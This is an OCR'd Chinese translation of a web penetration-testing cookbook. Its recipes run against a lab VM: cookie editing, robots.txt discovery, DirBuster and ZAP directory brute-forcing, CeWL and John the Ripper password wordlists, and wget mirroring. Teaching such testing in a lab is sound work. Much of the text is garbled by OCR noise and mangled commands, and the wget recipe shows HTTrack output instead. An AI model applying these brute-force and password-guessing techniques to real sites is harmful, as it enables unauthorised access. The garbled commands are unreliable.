需要 运行 我 们 的 vulnerable vm ° 192.168.56.1602 用 于 该 机 器 的 IP 地 址 ， 我 们 会 使 用 
OWASP-Mantra 作为 Web 3| W, 2$ ^ 


JR TE Y 
1. 浏览 http://192.168.56.102/WackoPicko ° 


2. 从 Mantra 的 菜单 栏 访问 Tools | Application Auditing | Cookies Manager + ° 


yf © WackoPicko.com x Y 


"n TT | Cookies Manager v1.5.l.1[showing1of1,... 9 © O 
> m ||1192168.56.102/WackoPicko/ d 
| Eile Edit View Tools Help 


WackoPicko.co| ^^ a i=) Refresh 


个 


E site v Name m 






Welcome to Wacko 


On WackoPicko, you can share all ya 
But thats not all, you ean also buy the 
version of someone's picturez. Wacko 


Name: PHPSESSID 
Contant: 5533je6esveno51pS80gro94vvO. 
Host: 192.168.56.102 


New Here? 
Create an account 


Check out a sample user! Path. / 
send For. Any type of connection 


400€ gj 60 6t G 4 € 0 - B € Y * 


What is going on today? 
gang y Expires: At end of session 








Or you can test to sea If WackoH . i | 
Add || Edit | Delete Clase 


在 这 个 截图 中 ， 我 们 可 以 从 这 个 插件 中 看 到 所 有 该 时 刻 储存 的 Cookie， 以 及 所 有 它们 所 
属 的 站 点 。 我 们 也 可 以 修改 它们 的 值 ， 删除 它们 以 及 添加 新 的 条 目 。 


3. 从 192.168.56.102 选择 PHPSESSID ， 之 后 点 击 Edit 。 
4. 将 Http only 的 值 修 改 为 ves ° 
Edit Cookie-- 
Name: W) PHPSESSID 
Content: M) ujbOk8r6citcOiSusoee 7p2kvO 
Host: W) 192.168.56.102 


Path: / 


Send For: Any type of connection 


Http Only: | Yes - 





























Expires: iv 














Save Close 





我 们 刚刚 修改 的 参数 ( Http only ) 告诉 浏览 器 ，Cookie 不 能 允许 客户 端 脚 本 访问 。 


工作 原理 


SF 


Cookies Managert 是 个 浏览 器 插件 ， 人 允许 我 们 查看 、 修 改 或 删除 现 有 的 Cookie > VUA S m 
新 的 条 目 。 因 为 一 些 应 用 依赖 于 储存 在 这 些 COokie 中 的 值 ， 攻 击 者 可 以 使 用 它们 来 输入 恶意 
的 模式 ， 可 能 会 修改 页 面 行 为 ， 或 者 提供 伪造 信息 用 于 获取 高 阶 权限 。 


同时 ， A n 会 话 Cookie 通 第 被 使 用 ， 通 第 是 登录 完成 之 后 的 用 户 标 识 符 的 
唯一 兰 苑 。 导致 潜在 的 有 效用 户 冒 充 ， 通 过 将 Cookie 值 蔡 换 为 某 个 活动 会 话 的 用 户 。 


2.6 利用 robots.txt 


要 想 进 一 步 侦 查 ， 我 们 需要 弄 清 楚 是 否 站 点 有 任何 页 面 或 目录 没有 链接 给 普通 用 户 看 。 例 
sn n 面 。 寻 找 类 似 于 它 的 站 点 会 极 大 扩大 我 们 的 测试 
， 并 给 我 们 一 些 关于 应 用 及 其 结构 的 重要 线索 。 


这 个 秘籍 中 ， 我 们 会 使 用 robots.txt. 文件 来 发 现 一 些 文件 和 上 目录， 它们 可 能 不 会 链接 到 主 应 
用 的 任何 地 方 。 


IRAE 2p HE 
1. 浏览 http://192.168.56.102/vicnum/ ° 
2， 现 在 我 们 向 URL 添加 robots.txt ， 之 后 我 们 会 看 到 如 下 截图 : 


m * | Ò 192.168.56.102/vicnum/robots.txt 


User-agent; * 
Disallow: /jotto/ 
Disallow: /cgi-bin/ 


这 个 文件 告诉 搜索 引擎 ? [Jotto 和 cgi-bin 的 首页 不 允许 被 任何 搜索 引 AE (User 
Agent) 收录 。 


3. 让 我 们 浏览 http://192.168.56.102/vicnum/cgi-bin/ » 


Bi- |1192.168.56.102/vicnum/cgi-bin/ 


Index of /vicnum/cgi-bin 


Name Last modified Size Description 
- Parent Directory 


quessnumi.pl 17-]u1-2012 23:24 2.2K 
quessnum2.pl 09-Jul-2012 15:25 4.4K 
m quessnum3.pl 09-Jul-2012 10:32 630 





otLtol.pl 18-Jul-2012 14:23 1.5K 
jotto2.pl 17-]u1-2012 23:24 4.1K 
jotto3.pl 14-Sep-2011 11:09 481 


我 们 可 以 直接 点 击 和 访问 目录 中 的 任何 Perl 脚本 。 


4. 让 我 们 浏览 http://192.168.56.102/vicnum/jotto/ 。 















































"i i [ 19 2,168.56. 10 FN enum] stt i | 


Index of /vicnum/jotto 


Name Last modified Size Description 
|f] iotto 11Jul-201217:30 60 
b. ARARA jotto 的 文件 ， 你 会 看 到 一 些 类 似 于 下 面 的 截图 的 东西 : 


> m” ||)192.168.56.102/vicnum/jotto/jotto 


Jooto 是 个 猜测 五 个 字符 的 单词 的 游戏 ， 这 会 不 会 是 可 能 答案 的 列表 呢 ? 通 过 玩 这 个 游戏 
来 检验 它 ， 如 果 是 的 话 ， 我 们 就 已 经 黑 掉 了 这 个 游戏 。 


工作 原理 


robots.txt Æ Web 服务 器 所 使 用 的 文件 ， 用 于 告诉 搜索 引擎 有 关 应 该 被 索引 ， 或 者 不 允许 
查看 的 文件 或 目录 的 信息 。 在 攻击 者 的 视角 上 ， 这 告诉 了 我 们 服务 器 上 是 否 有 目录 能 够 访问 
但 对 公众 隐藏 。 这 叫做 "以 隐蔽 求 安全 ” (也 就 是 说 假设 用 户 不 会 发 现 一 些 东西 的 和 存 在， 如果 它 
们 不 被 告知 的 话 ) 。 


2.7 使 用 DirBuster 发 现 文 件 和 文件 夹 


DirBuster 是 个 工具 ， 用 于 通过 爆破 来 发 现 Web 服务 器 中 的 现存 文件 和 目录 。 我 们 会 在 这 个 
秘籍 中 使 用 它 来 搜索 文件 和 目录 的 特定 列表 。 


准备 


我 们 会 使 用 一 个 文本 文件 ， 它 包含 我 们 要 求 DirBuster 寻找 的 单词 列表 。 创 建文 本 文 
fF dictionary.txt ， 包 含 下 列 东 西 : 


e info 

e server-status 
e server-info 
e cgi-bin 

e robots.txt 

e phpmyadmin 
e admin 

e login 


IR 1F JE 


1. 95" Applications | Kali Linux | Web Applications | Web Crawlers | dirbuster ° 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing EX CEN eh 
File Options About Help 


Target URL (ag httpy/example.com:BO0/) 
http4/182.168,56.102/ 











Work Method C) Use GET requests only © Auto Switch (HEAD and GET) 

Humber Of Threads 20 Threads [Go Faster 

Select scanning type: (« List based brute force © Pure Brute Force 

File with list of dirs/files 

/root/dictionary.txt | | Ci Browse | | € List Info| 


— - hy; i Nuus "x | F "T 
-har set |a-2A-ZO-B9621 -"» Minlength |i | Max Length |E | 


Select starting options i Standard start point (> URL Fuzz 


("| Brute Force Dirs [C] Be Recursive Dir to start with |/ 
|*| Brute Force Files C] Use Blank Extension File extension [php 
URL to fuzz - /tagt.htmi?url- T dir) -na 





在 DIrBuster 的 窗口 中 ， 将 目标 URL 设置 为 hnttp://192.168.56.102/ ° 

将 线程 数 设 置 为 20 。 

选择 List based brute force (基于 爆破 的 列表 ) 并 点 击 Browse (浏览 ) 。 
在 浏览 窗口 中 ， 选 择 我 们 刚刚 创建 的 文件 ( dictionary.txt ) 。 

取消 选择 Be Recursive (递归 ) » 

对 于 这 个 秘籍 ， 我 们 会 让 其 它 选 项 保持 上 默认。 


点 击 Start (开始 ) - 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing DX 
File Options About Help 


http;//192.168.56.102:80/ 





Testing for dirs in / 


Testing for files in / with extention .php 











Current speed: 0 requests/sec (Select and right click for more options) 


Average speed: (T) 12, (C) 0 requests/sec 
E reis Current number of running threads: 20 





Total Requests: 949/947 | | . [[ehange] 


Time To Finish: 一 
| € Hack I[ M Pause | | r Stop ] | Report 


Starting dir/file list based brute forcing 








9， 如 果 我 们 查看 Resuults (结果 ) 标签 页 ， 我 们 会 看 到 ，DirBuster 已 经 找到 了 至 少 两 个 目 
录 中 的 文件 : cgi-bin 和 phpmyadmin 。 响 应 代码 200 意味 着 文件 或 目录 存在 且 能 够 读 
取 。PhpMyAdmin 是 基于 Web 的 MySQL 数据 库 管 理 跨 ， 找 到 这 个 名 称 的 目录 告诉 我 们 
服务 器 中 存在 DBMS， 并 且 可 能 包含 关于 应 用 及 其 用 户 的 相关 信息 。 


E e ————— — Lo E: 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing 





File Options About Help 


httpJ/192.168.56.102:80/ 


@ Scan Information [Results - List View: Dire 0 Files: 470]. Results - Tree View | /A Errore 3 | 



































Dir [server-status/ 403 
Dir Jcgi-biny 200 
Dir j 200 
Dir iphpmyadmin 200 
File Icgi-bin/courierwebadmin 200 
File Iphpmyadmin/Documentation.html 200 
Dir /phpmyadmin/themes/ 403 
File /cgi-bin/courierwebadmin.cgi 200 
Dir ficons/ 200 
Dir /phpmyadmin/themes/original/ 403 
Dir Iphpmyadmir/themes/original/tmq/ 403 
File /phpmyadmin/imdex.php 200 
IDir WebGoaU 401 
Dir IESAPLIava-Swincdset-Interactivel 200. 





Current speed: 0 requests/sec (Select and right click for more options) 
Average speed: (T) 6, (C) 0 requests/sac 
Parse Queue Size: 0 Current number of por threads: 20 


Total Requests: 949/947 | || Change. Change | 
Time To Finish: ~ 


DirBuster Stopped 
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工作 原理 


DirBuster 是 个 上 爬 瑟 和 爆破 器 的 组 合 ， 它 允许 页 面 上 的 所 有 连接 ， 但 是 同时 尝试 可 能 文件 的 不 
同名 称 。 这 些 名 称 可 以 保存 在 文件 中 ， 类 似 于 我 们 所 使 用 的 那个 ， 或 者 可 以 由 DirBuster 通 
过 “纯粹 暴力 破解 "选项 ， 并 为 生成 单词 设置 字符 集 和 最 小 最 大 长 度 来 自动 生成 。 


为 了 判断 文件 是 否 存在 ，DirBuster 使 用 服务 器 生成 的 响应 代码 。 最 第 见 的 响应 在 下 面 列 出 : 
e 2000K :文件 存在 并 能 够 读 取 。 
e 404 File not found :文件 不 存在 。 
e 301 Moved permanently : 这 是 到 给 定 URL 的 重 定向 。 
e 401 Unauthorized : 需要 权限 来 访问 这 个 文件 。 


e 403 Forbidden :请求 有 效 但 是 服务 器 拒绝 响应 。 
2.8 使 用 Cewl TITZ 
在 每 次 渗透 测试 中 ， 查 查 都 必须 包含 分 析 层 

Jt 


以 及 其 它 被 目标 组 织 使 用 的 单词 。 当 需要 设 
们 判断 可 能 常 被 使 用 的 组 合 。 


面 ， 其 中 我 们 会 分 析 应 用 、 部 门 或 过 程 的 名 称 、 
置 人 员 相关 的 用 户 名 或 密码 的 时 候 ， 这 会 帮助 我 


这 个 秘籍 中 ， 我 们 会 使 用 CeWL 来 获取 应 用 所 使 用 的 单词 列表 。 并 保存 它 用 于 之 后 的 登录 页 
面 暴力 破解 。 


TE TE 29.3 
首先 ， 我 们 查看 CeWL 的 帮助 我 文件 ， 来 获得 能 够 做 什么 的 更 好 想法 。 在 终端 中 输入 : 


cewl --help 


can 5.0 Robin Wood (robinedigininija.org]) [ew .digininija.drg] 


Usage: cewl [OPTION] ... L 

-help, -h: show help 
-keep, -k: keep the downloaded file 
depth x, -d xi depth to spldar to, default z 
min word Length, -m: minimum word angu, default 3 
pffsite, -5i Let the spider visit other sites 
-write, -wW file: write the output to the file 

- -Ua; -U user-agent: useragent to send 

--no-words, -n: don't output tha wardlisi 

- -Mata, -a include mota data 

--meta fila file: output fila for mata dati 

--emall, -a ingl ude email addras ses 

--email fila fila: MEBUE. fila foi 
-meta-temp-dir directory: the temporary directory used by exiftool when parsing files, default /tmp 
count, -c: show the count E 





2， 我 们 会 使 用 CeWL 来 获得 vulnerable vm 中 WackoPicko 应 用 的 单词 。 我 们 想 要 长 度 最 
小 为 5 的 单词 了， 显示 单 全 数量 并 将 吉 果 保存 到 cewl WackoPicko.txt ° 


cewl -w cewl WackoPicko.txt -c -m 5 http://192.168.56.102/ WackoPicko/ 


3. WE > RATH CeWL 刚刚 生成 的 文件 ， 并 查看 “单词 数量 ” 偶 对 的 列表 。 这 个 列表 仍然 
需要 一 些 过 滤 来 去 掉 数 量 多 但 是 不 可 能 用 于 密码 的 单词 ， 例 如 “Services”，“Content" 或 
者 “information”。 


4. 让 我 们 删除 一 些 单词 来 构成 单词 列表 的 首 个 版 本 。 我 们 的 单词 列表 在 删除 一 些 单词 和 数 
量 之 后 ， 应 该 看 起 来 类 似 下 面 这 样 : 
5. WackoPicko 


. Users 
. person 


. Login 

. Guestbook 
11. Admin 

12. access 


6 
7 
8. unauthorized 
9 
0 


13. password 
14. Upload 

15. agree 

16. Member 
17. posted 

18. personal 
19. responsible 
20. account 
21. illegal 

22. applications 
23. Membership 
24. profile 


工作 原理 


CeWL 是 个 Kali 中 的 工具 ， 尺 取 网 站 并 提取 独立 单词 的 列表 。 他 它 也 可 以 提供 每 次 单词 的 重 
复 次 数 ， 保 存 结果 到 文件 ， 使 用 页 面 的 元 数据 ， 以 及 其 它 。 


ñ IL 


其 它 工具 也 可 用 于 类 似 目 的 ， 它 们 中 的 一 些 生成 基于 规则 或 其 它 单 词 列 表 的 单词 列表 ， 另 一 
些 可 以 让 取 网 站 来 寻找 最 常用 的 单词 。 


e Crunch : 这 是 基于 由 用 户 提供 的 字符 集合 的 生成 器 。 它 使 用 这 个 集合 来 生成 所 有 可 能 的 
组 合 。Crunch 包含 在 Kali 中。 

e Wordlist Maker (WLM) : WLM 能 够 基于 字符 集 来 生成 单词 列表 ， 也 能 够 从 文本 文件 和 网 
页 中 提取 单词 (http:/www.pentestplus.co.uk/wlm.htm) ° 


e Common User Password Profiler (CUPP) : 这 个 工具 可 以 使 用 单词 列表 来 为 常见 的 用 户 
名 分 析 可 能 的 密码 ， 以 及 从 数据 库 下 载 单词 列表 和 默认 密码 
(https://github.com/Mebus/cupp) ° 


2.9 使 用 John the Ripper 生成 字典 


John the Ripper 可 能 是 世界 上 最 这 大 多 数 涂 透 测 试 者 和 黑客 欢迎 的 密码 破解 回 。 他 拥有 许多 
特性 ， 例 如 自动 化 识别 常见 加 密 和 哈 希 算法 ， 使 用 字典 ， 以 及 爆破 攻击 。 因 此 ， 它 允许 我 们 
对 字典 的 单词 使 用 规则 、 人 和 修改 它 们 、 以 及 在 爆破 中 使 用 更 丰富 的 单词 列表 而 不 用 储存 列表 。 
最 后 这 个 特性 是 我 们 会 在 这 个 秘籍 中 使 用 的 特性 之 一 ， 用 于 基于 极其 简单 的 单词 列表 生成 扩 


more 

准备 

我 们 会 使 用 上 一 节 中 生成 的 单词 列表 ， 来 生成 可 能 均码 的 宇 典 。 
IRIE 2p 


1. John4Q] 4 AK m A PAAA E E A SCTE BS 883 85 SER o ERINA RT 89 EL P] RR 


qa pe s 


john --stdout --wordlist-cewl WackoPicko.txt 


Ok 看 john --stdout wordlist-cewl WackoPic 


fz[M Ne] Rad a 

L Sars 

person 
unauthorized 


personal 


responsible 


"leis am 
ars 





time: 0:00:00:00 DÖNE (Sun Jun 21 16:25:22 2015) w/s: 333 current: profile 


2. 4 —^* John 的 特性 是 让 我 们 使 用 规则 ， 以 多 种 方式 来 修改 列表 中 的 每 个 单词 ， 以 便 生 成 
更 复杂 的 字典 


john --stdout --wordlist-cewl WackoPicko.txt --rules 


你 可 以 在 结果 中 看 到 ，John 通过 转换 大 小 写 、 添 加 后 级 和 前 级 ， 以 及 将 字母 替换 为 数字 
和 符号 (leetspeak) 来 修改 单词 。 


3. 现在 我 们 需要 执行 相同 操作 ， 但 是 将 列表 发 送 给 文件 ， 便 于 我 们 之 后 使 用 : 
john --stdout --wordlist-cewl WackoPicko.txt --rules > dict WackoPicko.txt 


atdout wordlist-cewl WackoPlcko.txt rules > dict WackoPlckao,.txt 


j8:08 DONE (Sun Jun 21 16:36:43 2015) w/s: 16658 current: Profiling 


4. 现在 ， 我 们 拥有 了 999 个 单词 的 字典 ， 它 会 在 之 后 使 用 ， 用 于 进行 应 用 登录 页 面 上 的 窗 
码 猜 测 攻 击 。 





工作 原理 


虽然 John the Ripper 的 目标 并 不 是 字典 生成 器 ， 而 是 高 效 地 使 用 单词 列表 来 破解 密码 ( 它 也 
做 的 非常 好 ) 。 它 的 特性 允许 我 们 将 其 用 于 扩展 现 有 单词 列表 ， 并 创建 更 符合 现代 用 户 所 使 
Jt] 8 25 88 hg FPE o 


这 个 秘籍 中 ， 我 们 使 用 了 默认 的 规则 集合 来 修改 我 们 的 单词 。John 的 规则 定义 在 配置 文件 
中 ， 位 于 Kali 的 /etc/john/john.conf ° 


P 


A XJ John the Ripper 创 建 和 修改 规则 的 更 多 信息 ， 请 
IL : http://www.openwall.com/john/doc/RULES.shtml » 


2.10 使 用 ZAP 发 现 文 件 和 文件 来 


OWASP ZAP (Zed Attack Proxy) 是 个 用 于 Web 安全 测试 的 全 能 工具 。 他 拥有 代理 、 被 动 
和 主动 漏洞 扫描 器 、 模 糊 测 试 器 、 斥 虫 、HTTP 请 求 发 送 器 ， 一 起 一 些 其 他 的 有 趣 特 性 。 这 个 
秘籍 中 ， 我 们 会 使 用 最 新 添加 的 “强制 浏览 ”， 它 是 ZAP 内 的 DisBuster 实现 。 


准备 
这 个 秘籍 中 ， 我 们 需要 将 ZAP 用 做 浏览 器 的 代理 。 


1 打开 OWASP ZAP， 从 应 用 的 菜单 栏 中 ， 访 
l] Applications | Kali Linux | Web Applications | Web Application Fuzzers | owasp-zap 


Oo 


2. 在 Mantra X, Iceweasel 中 ， 访 问 主 菜 单 的 Preferences | Advanced | Network ， 


在 connection 中 点 击 Settings ° 


3. 选项 Manual proxy configuration (手动 代理 配置 ) ， 并 将 127.0.0.1 设置 为 HTTP X 
X8 » 8080 设置 为 端口 。 检 查 选 项 来 为 所 有 协议 使 用 同一 个 代理 ， 并 点 击 0k 。 





Connection Settinqs 
Configure Proxies to Access the Internet 
D No proxy 
O Auto-detect proxy settings for this network 
O Use system proxy settings 


(e Man ual proxy c onfig uration; 






































HITP Proxy: 127.0.0.1 Port: 8080 : 


W Use this proxy server for all protocols 


127.0.0.1 Porti | 8080 
127.0.0.1 | 8080 
127.0.0.1 Pori 3080 


No Proxy for: 
localhost, 127.0.0.1 


Example: .mozilla.org, .net.nz, 192.168.1.0/24 


O Automatic proxy configuration URL: 


Help Cancel OK 


4. 现在 ， 我 们 需要 告诉 ZAP 从 哪个 文件 获得 目录 名 称 。 从 ZAP 的 菜单 中 访 
站] Tools | Options | Forced Brows ， 之 后 总 击 Select File ° 
5. Kali 包含 一 些 单词 列表 ， 我 们 会 使 用 它们 之 一 : 选择 文 
件 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3small.txt ^? 之 后 点 


击 Open 。 












Y Options å | Forced Browse LET 
Active Scan 
Active Scan Input Vector Concurrent scanning threads per hast: 
| AJAX Spider e 
di Anti CSRF Tokens | [ i | | | | | | | | | | I | | | | | | i 





a AMI I2 13 214 13 I8 I7 218 18 20 











Open 
a | | p 

Look |n: |i dirbuster | à l| | eooo ë 
) | Select Fila... | 
ne-user-enum-1.0.txt [^] directory-list-2. 3-small.txt 
ne-user-enum-2. 0.txt | directory-list Jowercase-2.3-medium.txt 
tories.|brofuzz | B directory.list-lowercase.2,3-small,txt 
:ory-list-1 .0,txt 
jary-list-2. 3-medium.txt 
File Name: directory-listlowercase-2.3-small.t«t 


Files of Type: | Forced Browse 











Passive Scan Tags 


Scripts 

Search 
| Selenium t 
[4 XP H 





| Cancal || OK | 
6. 提示 框 会 告诉 我 们 文件 被 加 载 了 。 点 击 ok 之 后 再 点 击 ok 来 离开 options 对 话 框 。 


操作 步骤 
1. 合理 配 置 代 理 之 后 ， 浏 览 «http://192.168.56.102/ WackoPicko>。 


2. 我们 会 看 到 ZAP 通过 显示 我 们 刚刚 访问 的 主机 的 树 形 结构 ， 对 这 个 行为 作出 反应 。 


| Q9) Sites. 
oca 


Y Contexts 
[$] Default Context 
Y ip msites 
Y [3 M http://192.168.56.102 
|| F'' GET:WackoPicko 
|] Œ M GET:robots.txt 
| | Œ & GET:sitemap.xml 





3. IMË > Æ ZAP 的 左上 方面 板 中 ( sites 标签 页 ) ， 右 击 http://192.168.56.102 站 点 下 
面 的 wackoPicko 文件 来。 之 后 在 上 下 文 菜单 中 ， 访 


l^] Attack | Forced Browse directory ° 
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| Elle Edit yiew Analyse Report Iools Qnline Help 
(standard mode W) | G LL] I |-| aJa paa 0em 





划 


Untitled Session 


































E] Default Context 
* i sies 
Y ES fs http://192.168.56.102 
| RB GET:WackoPiIcko 
| | P # GET:robots.txt 
|| fs # GET:sitemap.xml 








Delete $ Spider... 












Resend... 
New lert.. 











a Fuz.. 








it ajg’ f D 


URL to attack: 


Welcome to the 


ZÁP is an easy to use integratec 


à Active Scan... 


Include in Context b J^ Forced Browse site 
Flag as Context um 

Run application » Z^ Forced Brow : 
Exclude from Context » 


| TT Configure your browser: 






e directory (and children) 








Please be aware that you shoulc 


To quickly test an application, er 


http:/i 
















4. 在 底部 的 面板 中 ， 我 们 会 看 到 显示 了 Forced Browse 标签 页 。 这 里 我 们 可 以 看 到 扫描 的 过 
程 和 结果 。 

































































E Aeq. Timestamp | Resp. Tmastamp | Method | URL [eode | Reason | Sze Resp.Header | Size Resp. Body 
〖 a21/Dn86/15 17:20:19 J1/D5/1517:20 19 GET ME 2.158 55 107: 8D/WackcPickalndaur 200 Ok SIE bytes  3.8E KB 
[2100815 17:20:20 — 21/D8/1517,20219 GET hitpull 92.158.556 102: 80 WackoPicka) 200 9K 574 bytes 3,48 KB 
|2108/517:20.19 ë ZL/iD6/1517.20619 GET hitp:ill 92.158. 56.102: 80 WackoPickolmages! 200 Ok 357 bytes 1.06 6B 
[210615172010 —— 21/06/1517:26118 OET Mipil 82.168.56 102: 80 WackoPickalabauti 200 ok 515 bytes 2.37 B 

| 210615 17:20:18. 210615172019 GET HitpcilL 02,158.56 1 02:80 ackoPicka/eemman.,. 200 ok 357 bytes 1.32 9B 
[2180615172018 20615172019. GET latp:ilL 02.168. 56 102: 80 ackoPickoreabendari 200 OK 516 bytes 2.64 WE 
21/06/15 17:2019 21/0815172615 BET Hitprill 62.168. 56.10 2:80 WackoPickniusersi 200 Ok 257 byes 2.25 KjB 
[20e 172015 21/0815172019 GET Hitp-ilL 62.168.56 102:80 Ww ackoPickaladmiry 500 intemal Ser. did bytes 0 bytes 

| 21/06/15 17:20:20 21515172020 GET Hhitp i/152.158.556 102:8 D AWackoPickarunlead/ züo OK 257 tes 3.4 K)H 

| zlumé15 17:020 zl 5205172020 BET hat pa 52.15E.556.102B80/Wackoficknicart/ 200 OK 347 intes 1.285 EB 

| 21/D6/15 17:20:20 Zl/D55rL7:2020 GET hitp-it 52.155.556 102:80/WackoPickar/pictune si 200 OE 317 meer 22E HB 

| 21/n6/15 17:20:20 2l1/DA/15 T7:20:20 GET hitpaii 52.15B.56 102:80/Wacko?icko images .. 06 JE z336 yes gon bytes 

| 21/06/15 17:30:20 zlrio5/15 17:20 20 BET hitp-i/] 92.155.556 102: 3D/WackoPickniusarsih .. 303 Soe Other S55 mias 0 bates 

| 210615 17:20:2D Z1mansl17: 30 20 GET hitp-i/l 92.15E.56 102: 30 acken lialusersit.. 303 Soe Other 559 nter 0 mtrs 

| 2185/15 17:20:20 21/DA5m517:2pDe- 20 GET hitp-i/t g2.15E 556 102: 30/WackoPIcknfuzarsi... 303 Sae Dthear 55 ice ü zs 

| 214&n$8 17-n.»mn TL THN IT O63 RET. betn-i BY LRR SE- 107: 8 Dui zu bes Lond ci ^W C TT huura 

| Mats D MI E5 MD. Cunen Scans M A9 go Wo 130 TT 


IS 


当 我 们 配置 浏览 器 来 将 ZAP 用 作 代 理 的 时 候 ， 它 并 不 直接 发 送 给 服务 
页 inis 青 求 ， 而 是 发 到 我 们 定义 的 地 址 。 这 里 是 ZAP 监 
器 但 是 不 分 析 任 何 我 们 发 送 的 信息 。 


Je 


ZAP 的 强制 浏览 的 工作 方式 和 DirBuster 相同 ， 它 接受 我 们 所 配 


is 
Ws 


的 字典 ， 


器 任何 我 们 打算 浏览 的 


听 的 地 址 。 之 后 ZAP 将 请 


并 向 服务 


ER A e 


ad E ~ 
LE EESS 


请 求 ， 就 像 它 尝 试 浏 览 列 表 中 的 文件 那样 。 * 如 果 文件 存在 ， 服 务 器 会 相应 地 响应 。 如 果 文件 


不 存在 或 不 能 被 我 们 的 当前 用 户 访 问 ， 服 务 器 会 返回 错误 。 
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Kali 中 包含 的 另 一 个 非常 实用 的 代理 是 Burp Suite。 它 也 拥有 一 些 特 别 有 趣 的 特性 。 其 中 可 用 
作 强 制 浏览 的 替代 品 是 Intruder。 虽 然 Burp Suite 并 不 特地 用 于 该 目的 ， 但 是 它 是 个 值得 研 
完 的 通用 工具 。 


PEE RRF k 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


渗透 测试 可 以 通过 多 种 途径 完成 ， 例 如 黑 盒 、 灰 盒 和 和 白 盒 。 黑 盒 测 试 在 测试 者 没有 任何 应 用 
的 前 置信 息 条 件 下 执行 ， 除 了 服务 器 的 URL 。 白 盒 测试 在 测试 者 拥有 目标 的 全 部 信息 的 条 件 
下 执行 ， 例 如 它 的 构造 、 软 件 版 本 、 测 试用 户 、 开 发 信息 ， 以 及 其 它 。 灰 盒 测试 是 黑 盒 和 和 白 


TAJ 混合 a 


对 于 黑 盒 和 灰 盒 测试 ， 侦 查 阶 段 对 测试 者 非常 必然 ， 以 便 发 现 白 盒 测试 中 通 第 由 应 用 所 有 者 
提供 供 的 信息 ie 

我 们 打算 采取 黑 盒 测试 方式 ， 因 为 它 涉 及 到 外 部 攻击 者 用 于 获取 足够 信息 的 所 有 步骤 ， 以 便 
入 侵 应 用 或 服务 器 的 特定 功能 。 

作为 每 个 Web 活 透 测试 中 侦查 阶段 的 一 部 分 ， 我 们 需要 浏览 器 每 个 包含 在 网 页 中 的 链接 ， 并 


跟踪 ON MER 有 一 些 工 具 能 够 帮助 我 们 目 动 和 以 及 加 速 完成 这 个 任务 A pura 
Web JE R Aii o RE LRA ub SRI BT F) ee 用 ， 有 的 时 候 会 填充 表单 并 


将 它们 发 送 到 服务 器 ， 人 保存 所 有 请 求 和 响应 来 浏览 网 页 ， 从 而 提供 给 我 们 离线 分 析 它 们 的 机 
会 o 
这 一 草 中 ， 我 们 会 涉及 到 一 些 包含 在 Kali T 89 3 8948 HH] » dn 2 SE AXI TA AR US SCPETS B 


录 ， 来 寻找 第 见 的 网 页 。 


3.1 使 用 Wget 为 离线 分 析 下 载 网 页 


Wget 是 GNU 项 目的 一 部 分 ， 也 和 包含 在 主流 linux 发 行 版 中 ， 包 括 Kali o 它 能 够 递归 为 离线 浏 
览 下 载 网 页 ， 包 括 链 接 转换 和 下 载 非 HTML 文件 。 


这 个 秘籍 中 ， 我 们 会 使 用 Wget 来 下 载 和 vulnerable vm 中 的 应 用 相关 的 页 面 


准备 
一 章 的 所 有 秘籍 都 需要 运行 vulnerable vm。 在 这 本 书 的 特定 场景 中 ， 它 的 IP 地 址 为 
192.168.56.102 » 


TETEOy 9 


让 我 们 做 第 一 次 尝试 ， 通 过 仅仅 以 一 个 参数 调用 Wget TF 3X 31 d o 
wget http://192.168.56.102/bodgeit/ 


Et 站 mkdir bodgeit httrack 
Le 天 Ci al bodge jit httrac k / 
bodgeit httrack£ httrack http://192 


it/ 
WARMING! You are running this program as root! 
It might be a good idea to use the -U option to change the userid: 


Example: -*U smith 


Mirror lauri sun, 12 Jul 2815 13:52:13 by HTTrack Website Copiar/3.456«Llibh 
tsijava.so.2 XRECO' 2010] 

mirroring | i 168.56. dead OA Ey with the wizard help.. 

Done.: 192.158.55.102/Dbodgeit/advanced.jsp (0 bytes) - 2500 

Thanks for ‘using HTTrack | 





我 们 可 以 看 到 ， 它 仅仅 下 载 了 index.htm 文件 到 当前 目录 ， 这 是 应 用 的 首页 。 


我 们 需要 使 用 一 些 选项 ， 告 诉 Wget 将 所 有 下 载 的 文件 保存 到 特定 目录 中 ， 并 且 复 制 我 们 
设 为 参数 的 URL 中 包含 的 所 有 文件 。 让 我 们 首先 创建 目录 来 保存 这 些 文件 : 


mkdir bodgeit offline 


现在 ， 我 们 会 递归 下 载 应 用 中 所 有 文件 并 保存 到 相应 目录 中 。 


wget -r -P bodgeit offline/ http://192.168.56.102/bodgeit/ 


The Badgelt Store x Y i The Badgelt Stare x Éy 

















€ B 一 File: /raot/My Cookbook/test/bodgeit httrack/192. 168.56. 10 2/bodgert/mdex.html le EJ VES ñ * 
$ T NEXU = 
» The Bodgelt Store 
3 | 
z Wa bodge it so you dont have tol Guest usar | 
3 Home About Us Contact Us Login Your Basket Search 
: Doodahs Our Best Deals! 
hd Gizmos 
et Thingamajigs Product Type Price 
E Ihingies [Thingies 4 Thingies £3.50 
Mhatchamnacallits GUTEN en el 
kd Whatsits —— Whatsit called Whatsits $4.10 
t£ Widnais TGJ CCD hingamajigs | $220 
2 Whnatsit taste like Whatsits pa gg 
E Bonzo dog doo dah Doodahs $2.45| 
" Thingis 3 Thingias $3.30 
E TJ AAA Thingamajigs $0.80 
ue GZ FZE Gizmos $1.00 
k IY ouknawwhat Whatcharmnacallits $4.32| 
iz Whatsit taste lika Whatsits $3.96 


工作 原理 


像 之 前 提 到 的 那样 ，Wget 是 个 为 下 载 HTTP. 内 容 创 建 的 工具 。 通 过 -r 参数 ， 我 们 可 以 使 其 
递归 下 载 ， 这 会 按照 它 所 下 载 的 每 个 页 面 的 所 有 连接 ， 并 同样 下 载 它们 。 -Pp 选项 允许 我 们 设 
置 目录 前 级 ， 这 是 Wget 会 开始 保存 下 载 内 容 的 目录 。 默 认 它 设 为 当前 目录 。 

更 多 

在 我 们 使 用 Wget 时 ， 可 以 考虑 一 些 其 它 的 实用 选项 : 


o -1 :在 递归 下 载 的 时 候 ， 规 定 Wget 的 遍历 深度 可 能 很 有 必要 。 这 个 选项 后 面 带 有 我 们 
想 要 遍历 的 层级 深度 的 数值 ， 让 我 们 规定 这 样 的 界限 。 


